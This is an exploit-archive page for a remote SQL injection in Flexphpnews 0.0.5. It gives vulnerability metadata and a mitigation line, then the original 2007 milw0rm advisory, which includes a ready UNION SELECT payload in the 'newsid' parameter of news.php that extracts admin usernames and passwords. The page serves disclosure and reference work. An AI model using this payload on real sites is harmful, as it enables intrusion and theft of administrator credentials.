Flexphpnews version 0.0.5 Remote SQL Injection Vulnerability

vendor:

Flexphpnews

by:

Dj7xpl

7.5

CVSS

HIGH

Remote SQL Injection

CWE

Product Name: Flexphpnews

Affected Version From: 0.0.5

Affected Version To: 0.0.5

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

Flexphpnews version 0.0.5 Remote SQL Injection Vulnerability

This vulnerability allows an attacker to perform SQL injection by manipulating the 'newsid' parameter in the 'news.php' file. By using a UNION SELECT statement, the attacker can retrieve the usernames and passwords from the 'newsadmin' table.

Mitigation:

The vendor should release a patch to sanitize user input and prevent SQL injection attacks.

Source

Exploit-DB raw data:

                                                          .-""""""""-.                                 
                                                         /   Dj7xpl   \                              
                                                        |              |                                
                                                        |,  .-.  .-.  ,|                                
                                                        | )(_o/  \o_)( |                                     
                                                        |/     /\     \|                                 
                                              (@_       (_     ^^     _)                  
                                         _     ) \_______\__|IIIIII|__/_______________________________
                                        (_)@8@8{}<________|-\IIIIII/-|________________________________>
                                               )_/        \          / 
                                               (@
											   
+_______________________________________________Iranian Are The Best In World___________________________________________+
*
*
*       [~] Portal.......:    Flexphpnews version 0.0.5
*	[~] Download.....:    http://www.china-on-site.com/flexphpsite/other.php
*	[~] Author.......:    Dj7xpl  | Dj7xpl@yahoo.com
*	[~] Class........:    Remote SQL Injection Vulnerability
*
+_______________________________________________________________________________________________________________________+


+_______________________________________________________________________________________________________________________+
*
*
*       [~] Exploit......:     http://[Taget]/[Path]/news.php?newsid=999+union+select+0,username,password+from+newsadmin
*
+_______________________________________________________________________________________________________________________+


+_______________________________________________________________________________________________________________________+
*
*
*       [~] Sp Tnx.......:     Milw0rm, Ashiyane, Delta Hacking, Virangar, Hackerz.ir, Shabgard.org, Simorgh .........
*
+_______________________________________________________________________________________________________________________+

# milw0rm.com [2007-04-01]